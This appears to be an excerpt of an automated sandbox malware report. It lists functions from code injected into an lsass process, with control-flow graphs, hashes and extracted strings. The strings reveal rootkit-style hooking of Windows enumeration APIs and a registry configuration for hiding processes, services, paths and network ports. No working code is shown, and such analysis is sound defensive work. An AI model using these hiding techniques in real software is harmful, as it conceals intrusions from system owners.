lstrlenW 15052->15054 15053->15042 15054->15053 15055 140ae861a96 StrCpyW 15054->15055 15055->15053 15057 140ae863851 StrCmpNIW 15056->15057 15058 140ae863866 15056->15058 15057->15058 15058->15045 15060 140ae863076 StrCpyW StrCatW 15059->15060 15061 140ae86308d PathCombineW 15059->15061 15062 140ae863096 15060->15062 15061->15062 15062->15045 15064 140ae861ccc 15063->15064 15065 140ae861cc3 15063->15065 15064->15045 15066 140ae86152c 2 API calls 15065->15066 15066->15064

                                                                                Executed Functions

                                                                                Function 00000140AE86253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 5 140ae86253c-140ae8625c0 call 140ae882cc0 8 140ae8625c6-140ae8625c9 5->8 9 140ae8627d8-140ae8627fb 5->9 8->9 10 140ae8625cf-140ae8625dd 8->10 10->9 11 140ae8625e3-140ae862629 call 140ae868c60 * 3 GetFileType 10->11 18 140ae862641-140ae86264b call 140ae861a40 11->18 19 140ae86262b-140ae86263f StrCpyW 11->19 21 140ae862650-140ae862654 18->21 19->21 22 140ae8626ff-140ae862704 21->22 23 140ae86265a-140ae862673 call 140ae8630a8 call 140ae863844 21->23 24 140ae862707-140ae86270c 22->24 36 140ae862675-140ae8626a4 call 140ae8630a8 call 140ae863044 call 140ae861cac 23->36 37 140ae8626aa-140ae8626f4 call 140ae882cc0 23->37 26 140ae86270e-140ae862711 24->26 27 140ae862729 24->27 26->27 29 140ae862713-140ae862716 26->29 31 140ae86272c-140ae862745 call 140ae8630a8 call 140ae863844 27->31 29->27 32 140ae862718-140ae86271b 29->32 48 140ae862787-140ae862789 31->48 49 140ae862747-140ae862776 call 140ae8630a8 call 140ae863044 call 140ae861cac 31->49 32->27 35 140ae86271d-140ae862720 32->35 35->27 39 140ae862722-140ae862727 35->39 36->9 36->37 37->9 46 140ae8626fa 37->46 39->27 39->31 46->23 51 140ae8627aa-140ae8627ad 48->51 52 140ae86278b-140ae8627a5 48->52 49->48 69 140ae862778-140ae862783 49->69 55 140ae8627b7-140ae8627ba 51->55 56 140ae8627af-140ae8627b5 51->56 52->24 59 140ae8627d5 55->59 60 140ae8627bc-140ae8627bf 55->60 56->9 59->9 60->59 63 140ae8627c1-140ae8627c4 60->63 63->59 65 140ae8627c6-140ae8627c9 63->65 65->59 66 140ae8627cb-140ae8627ce 65->66 66->59 68 140ae8627d0-140ae8627d3 66->68 68->9 68->59 69->9 70 140ae862785 69->70 70->24
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                • Instruction ID: 006047059f567fc424369bd4eaabb636d5541b44e56c09e15fbbbd16066aee87
                                                                                • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                • Instruction Fuzzy Hash: 6E71173624078185EB26DF2BD8407EAA790F38D7A4F640126DF0D5BBA9DE34CE45C382
                                                                                Function 00000140AE86202C Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 162COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 71 140ae86202c-140ae862057 call 140ae882d00 73 140ae86205d-140ae862066 71->73 74 140ae86206f-140ae862072 73->74 75 140ae862068-140ae86206c 73->75 76 140ae862223-140ae862243 74->76 77 140ae862078-140ae86207b 74->77 75->74 78 140ae862173-140ae862176 77->78 79 140ae862081-140ae862093 77->79 81 140ae8621e7-140ae8621ea 78->81 82 140ae862178-140ae862192 call 140ae862f04 78->82 79->76 80 140ae862099-140ae8620a5 79->80 83 140ae8620a7-140ae8620b7 80->83 84 140ae8620d3-140ae8620de call 140ae861bbc 80->84 81->76 85 140ae8621ec-140ae8621ff call 140ae862f04 81->85 82->76 94 140ae862198-140ae8621ae 82->94 83->84 87 140ae8620b9-140ae8620d1 StrCmpNIW 83->87 91 140ae8620ff-140ae862111 84->91 96 140ae8620e0-140ae8620f8 call 140ae861bf4 84->96 85->76 95 140ae862201-140ae862209 85->95 87->84 87->91 97 140ae862113-140ae862115 91->97 98 140ae862121-140ae862123 91->98 94->76 99 140ae8621b0-140ae8621cc 94->99 95->76 100 140ae86220b-140ae862213 95->100 96->91 113 140ae8620fa-140ae8620fd 96->113 102 140ae862117-140ae86211a 97->102 103 140ae86211c-140ae86211f 97->103 104 140ae862125-140ae862128 98->104 105 140ae86212a 98->105 106 140ae8621d0-140ae8621e3 99->106 109 140ae862216-140ae862221 100->109 107 140ae86212d-140ae862130 102->107 103->107 104->107 105->107 106->106 108 140ae8621e5 106->108 111 140ae862132-140ae862138 107->111 112 140ae86213e-140ae862141 107->112 108->76 109->76 109->109 111->80 111->112 112->76 114 140ae862147-140ae86214b 112->114 113->107 115 140ae862162-140ae86216e 114->115 116 140ae86214d-140ae862150 114->116 115->76 116->76 117 140ae862156-140ae86215b 116->117 117->114 118 140ae86215d 117->118 118->76
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID: S$dialer
                                                                                • API String ID: 756756679-3873981283
                                                                                • Opcode ID: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                                                • Instruction ID: 6995ce01178be5ec7128772deebd1550e485b351504c4b94060f668f1040f1af
                                                                                • Opcode Fuzzy Hash: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                                                • Instruction Fuzzy Hash: 6E51BE32B5572486EB62CB2BA8406EDA3F5F7087A4F249451DF0D13BA5DB35DC91C382
                                                                                Function 00000140AE861A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                • String ID: \\?\
                                                                                • API String ID: 2719912262-4282027825
                                                                                • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction ID: c3158435ef4687b1766e3257663a9035ab9b0d40d8f3ba1c44d0f0f8ec37f8a1
                                                                                • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction Fuzzy Hash: 7DF03C3274474192EB618B22E9847996760F74CBE9FA44020DF4D47979DE3DCA8DCB41
                                                                                Function 00000140AE86328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                • String ID:
                                                                                • API String ID: 1683269324-0
                                                                                • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction ID: 3ba806e3e51b1b0dcb359024cf54f050519727a8cf8c5b8b8f5a43b5e8428739
                                                                                • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction Fuzzy Hash: BA115E30A9478082F7639B23B9153D922D4B79C765FB041249F4E875B1EF78C844C2C2
                                                                                Function 00000140AE861ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 00000140AE861628: GetProcessHeap.KERNEL32 ref: 00000140AE861633
                                                                                  • Part of subcall function 00000140AE861628: HeapAlloc.KERNEL32 ref: 00000140AE861642
                                                                                  • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE8616B2
                                                                                  • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE8616DF
                                                                                  • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8616F9
                                                                                  • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861719
                                                                                  • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE861734
                                                                                  • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861754
                                                                                  • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE86176F
                                                                                  • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE86178F
                                                                                  • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8617AA
                                                                                  • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE8617CA
                                                                                • Sleep.KERNEL32 ref: 00000140AE861AD7
                                                                                • SleepEx.KERNELBASE ref: 00000140AE861ADD
                                                                                  • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8617E5
                                                                                  • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861805
                                                                                  • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE861820
                                                                                  • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861840
                                                                                  • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE86185B
                                                                                  • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE86187B
                                                                                  • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE861896
                                                                                  • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8618A0
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1534210851-0
                                                                                • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction ID: 326f40d2db6ff263f8e0a940b391fb73a78b65f37836ebd93bce5d4d1fbe3847
                                                                                • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction Fuzzy Hash: 2631CC7128074181FF529B27DA513E963A5AB8CBE4F2858219F1E877B7EF34CC51C292
                                                                                Function 00000140ADFC273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 176 140adfc273c-140adfc27a4 call 140adfc29d4 * 4 185 140adfc27aa-140adfc27ad 176->185 186 140adfc29b2 176->186 185->186 188 140adfc27b3-140adfc27b6 185->188 187 140adfc29b4-140adfc29d0 186->187 188->186 189 140adfc27bc-140adfc27bf 188->189 189->186 190 140adfc27c5-140adfc27e6 189->190 190->186 192 140adfc27ec-140adfc280c 190->192 193 140adfc280e-140adfc2836 192->193 194 140adfc2838-140adfc283f 192->194 193->193 193->194 195 140adfc28df-140adfc28e6 194->195 196 140adfc2845-140adfc2852 194->196 198 140adfc28ec-140adfc2901 195->198 199 140adfc2992-140adfc29b0 195->199 196->195 197 140adfc2858-140adfc286a LoadLibraryA 196->197 200 140adfc286c-140adfc2878 197->200 201 140adfc28ca-140adfc28d2 197->201 198->199 202 140adfc2907 198->202 199->187 204 140adfc28c5-140adfc28c8 200->204 201->197 205 140adfc28d4-140adfc28d9 201->205 203 140adfc290d-140adfc2921 202->203 207 140adfc2982-140adfc298c 203->207 208 140adfc2923-140adfc2934 203->208 204->201 209 140adfc287a-140adfc287d 204->209 205->195 207->199 207->203 210 140adfc293f-140adfc2943 208->210 211 140adfc2936-140adfc293d 208->211 212 140adfc287f-140adfc28a5 209->212 213 140adfc28a7-140adfc28b7 209->213 216 140adfc294d-140adfc2951 210->216 217 140adfc2945-140adfc294b 210->217 215 140adfc2970-140adfc2980 211->215 218 140adfc28ba-140adfc28c1 212->218 213->218 215->207 215->208 219 140adfc2963-140adfc2967 216->219 220 140adfc2953-140adfc2961 216->220 217->215 218->204 219->215 222 140adfc2969-140adfc296c 219->222 220->215 222->215
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3311300109.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140adfc0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction ID: 06fb5e1ef4416040f010e1a7d6ba73e71e6e03eebacef6a42692c0d9d5c867cd
                                                                                • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction Fuzzy Hash: 10610732B2179887DB65CF1690407AE7393FB58B98F688121DF5907BD4DA38D863E700

                                                                                Non-executed Functions

                                                                                Function 00000140AE862B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 484 140ae862b2c-140ae862ba5 call 140ae882ce0 487 140ae862ee0-140ae862f03 484->487 488 140ae862bab-140ae862bb1 484->488 488->487 489 140ae862bb7-140ae862bba 488->489 489->487 490 140ae862bc0-140ae862bc3 489->490 490->487 491 140ae862bc9-140ae862bd9 GetModuleHandleA 490->491 492 140ae862bed 491->492 493 140ae862bdb-140ae862beb call 140ae876090 491->493 494 140ae862bf0-140ae862c0e 492->494 493->494 494->487 498 140ae862c14-140ae862c33 StrCmpNIW 494->498 498->487 499 140ae862c39-140ae862c3d 498->499 499->487 500 140ae862c43-140ae862c4d 499->500 500->487 501 140ae862c53-140ae862c5a 500->501 501->487 502 140ae862c60-140ae862c73 501->502 503 140ae862c75-140ae862c81 502->503 504 140ae862c83 502->504 505 140ae862c86-140ae862c8a 503->505 504->505 506 140ae862c8c-140ae862c98 505->506 507 140ae862c9a 505->507 508 140ae862c9d-140ae862ca7 506->508 507->508 509 140ae862d9d-140ae862da1 508->509 510 140ae862cad-140ae862cb0 508->510 511 140ae862da7-140ae862daa 509->511 512 140ae862ed2-140ae862eda 509->512 513 140ae862cc2-140ae862ccc 510->513 514 140ae862cb2-140ae862cbf call 140ae86199c 510->514 518 140ae862dac-140ae862db8 call 140ae86199c 511->518 519 140ae862dbb-140ae862dc5 511->519 512->487 512->502 516 140ae862d00-140ae862d0a 513->516 517 140ae862cce-140ae862cdb 513->517 514->513 522 140ae862d0c-140ae862d19 516->522 523 140ae862d3a-140ae862d3d 516->523 517->516 521 140ae862cdd-140ae862cea 517->521 518->519 525 140ae862dc7-140ae862dd4 519->525 526 140ae862df5-140ae862df8 519->526 530 140ae862ced-140ae862cf3 521->530 522->523 531 140ae862d1b-140ae862d28 522->531 532 140ae862d3f-140ae862d49 call 140ae861bbc 523->532 533 140ae862d4b-140ae862d58 lstrlenW 523->533 525->526 527 140ae862dd6-140ae862de3 525->527 528 140ae862e05-140ae862e12 lstrlenW 526->528 529 140ae862dfa-140ae862e03 call 140ae861bbc 526->529 535 140ae862de6-140ae862dec 527->535 541 140ae862e14-140ae862e1e 528->541 542 140ae862e35-140ae862e3f call 140ae863844 528->542 529->528 546 140ae862e4a-140ae862e55 529->546 539 140ae862d93-140ae862d98 530->539 540 140ae862cf9-140ae862cfe 530->540 543 140ae862d2b-140ae862d31 531->543 532->533 532->539 536 140ae862d5a-140ae862d64 533->536 537 140ae862d7b-140ae862d8d call 140ae863844 533->537 545 140ae862dee-140ae862df3 535->545 535->546 536->537 547 140ae862d66-140ae862d79 call 140ae86152c 536->547 537->539 550 140ae862e42-140ae862e44 537->550 539->550 540->516 540->530 541->542 551 140ae862e20-140ae862e33 call 140ae86152c 541->551 542->550 543->539 552 140ae862d33-140ae862d38 543->552 545->526 545->535 555 140ae862e57-140ae862e5b 546->555 556 140ae862ecc-140ae862ed0 546->556 547->537 547->539 550->512 550->546 551->542 551->546 552->523 552->543 561 140ae862e63-140ae862e7d call 140ae8685c0 555->561 562 140ae862e5d-140ae862e61 555->562 556->512 565 140ae862e80-140ae862e83 561->565 562->561 562->565 568 140ae862ea6-140ae862ea9 565->568 569 140ae862e85-140ae862ea3 call 140ae8685c0 565->569 568->556 571 140ae862eab-140ae862ec9 call 140ae8685c0 568->571 569->568 571->556
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                • API String ID: 2119608203-3850299575
                                                                                • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                • Instruction ID: bf2ef32ac57e5f465ce725a7a74baab9ea04f71ed1d086599ba6561ce8fa9f42
                                                                                • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                • Instruction Fuzzy Hash: 2AB19E72250B5486EB668F2BD4407E9A3A5FB48BA4F645066EF4D53BB5DF34CC40C382
                                                                                Function 00000140AE867D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 3140674995-0
                                                                                • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction ID: 1503c4d1f0e9a2face0525283fdd9087e61cbfeab21d2c89dc1035b309a16709
                                                                                • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction Fuzzy Hash: 2131A372245B808AEB618F61E8407ED7361F788754F64442ADF4D47BA8EF38C948C790
                                                                                Function 00000140AE86D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 1239891234-0
                                                                                • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction ID: f4b3617ef55b8c279f228a1357564ad9138b4f9cc27f1e8a361b5862f6d2fb0c
                                                                                • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction Fuzzy Hash: 9C314E32654B8086EB619F26E8403DE73A4F789764F600125EF9D47BB8EF38C945CB81
                                                                                Function 00000140AE861628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                • API String ID: 106492572-2879589442
                                                                                • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction ID: 4cb465b735a6020238bf1ea048d5c89955278629e63a0cab2664c088472f563d
                                                                                • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction Fuzzy Hash: 5771E736750B10C6EB129F66E8906D933A5FB89BA8F201121DF4E97B79DF38C844C781
                                                                                Function 00000140AE8612BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                • String ID: d
                                                                                • API String ID: 2005889112-2564639436
                                                                                • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction ID: eaf29793312f880262aa33c4d225e9377ef8ac7c3781aeeffa93a87445d713dc
                                                                                • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction Fuzzy Hash: B5516C32640B8486EB56CF62E54839AB7A1F78DBA9F244124DF4D07B29DF3CC445C791
                                                                                Function 00000140AE861D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                • API String ID: 4175298099-1975688563
                                                                                • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction ID: 2267be31c3c8b37de2fa04f2787d19f37c5545ab8d6e24567a23a1f44e334d39
                                                                                • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction Fuzzy Hash: 3531A574580B4AA0EA07EB6BE8516E47321BB5D3B4FF05413AE0D131B69F788E49C3D2
                                                                                Function 00000140ADFC6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 326 140adfc6910-140adfc6916 327 140adfc6918-140adfc691b 326->327 328 140adfc6951-140adfc695b 326->328 329 140adfc691d-140adfc6920 327->329 330 140adfc6945-140adfc6984 call 140adfc6fc0 327->330 331 140adfc6a78-140adfc6a8d 328->331 332 140adfc6938 __scrt_dllmain_crt_thread_attach 329->332 333 140adfc6922-140adfc6925 329->333 349 140adfc698a-140adfc699f call 140adfc6e54 330->349 350 140adfc6a52 330->350 334 140adfc6a9c-140adfc6ab6 call 140adfc6e54 331->334 335 140adfc6a8f 331->335 341 140adfc693d-140adfc6944 332->341 337 140adfc6927-140adfc6930 333->337 338 140adfc6931-140adfc6936 call 140adfc6f04 333->338 347 140adfc6aef-140adfc6b20 call 140adfc7190 334->347 348 140adfc6ab8-140adfc6aed call 140adfc6f7c call 140adfc6e1c call 140adfc7318 call 140adfc7130 call 140adfc7154 call 140adfc6fac 334->348 339 140adfc6a91-140adfc6a9b 335->339 338->341 360 140adfc6b31-140adfc6b37 347->360 361 140adfc6b22-140adfc6b28 347->361 348->339 358 140adfc6a6a-140adfc6a77 call 140adfc7190 349->358 359 140adfc69a5-140adfc69b6 call 140adfc6ec4 349->359 354 140adfc6a54-140adfc6a69 350->354 358->331 376 140adfc69b8-140adfc69dc call 140adfc72dc call 140adfc6e0c call 140adfc6e38 call 140adfcac0c 359->376 377 140adfc6a07-140adfc6a11 call 140adfc7130 359->377 366 140adfc6b7e-140adfc6b94 call 140adfc268c 360->366 367 140adfc6b39-140adfc6b43 360->367 361->360 365 140adfc6b2a-140adfc6b2c 361->365 372 140adfc6c1f-140adfc6c2c 365->372 387 140adfc6bcc-140adfc6bce 366->387 388 140adfc6b96-140adfc6b98 366->388 373 140adfc6b4f-140adfc6b5d call 140adfd5780 367->373 374 140adfc6b45-140adfc6b4d 367->374 379 140adfc6b63-140adfc6b78 call 140adfc6910 373->379 391 140adfc6c15-140adfc6c1d 373->391 374->379 376->377 429 140adfc69de-140adfc69e5 __scrt_dllmain_after_initialize_c 376->429 377->350 399 140adfc6a13-140adfc6a1f call 140adfc7180 377->399 379->366 379->391 389 140adfc6bd5-140adfc6bea call 140adfc6910 387->389 390 140adfc6bd0-140adfc6bd3 387->390 388->387 396 140adfc6b9a-140adfc6bbc call 140adfc268c call 140adfc6a78 388->396 389->391 408 140adfc6bec-140adfc6bf6 389->408 390->389 390->391 391->372 396->387 423 140adfc6bbe-140adfc6bc6 call 140adfd5780 396->423 416 140adfc6a45-140adfc6a50 399->416 417 140adfc6a21-140adfc6a2b call 140adfc7098 399->417 413 140adfc6bf8-140adfc6bff 408->413 414 140adfc6c01-140adfc6c11 call 140adfd5780 408->414 413->391 414->391 416->354 417->416 428 140adfc6a2d-140adfc6a3b 417->428 423->387 428->416 429->377 430 140adfc69e7-140adfc6a04 call 140adfcabc8 429->430 430->377
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3311300109.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140adfc0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                • API String ID: 190073905-1786718095
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: 79a856343edf9d6588f3d0cd2b4f253cfe509a1624521d714eea0eda72951458
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: FC81E23162834987F656AB6798403DB72A3EF8D784F3440259B69477B6DB38C867B300
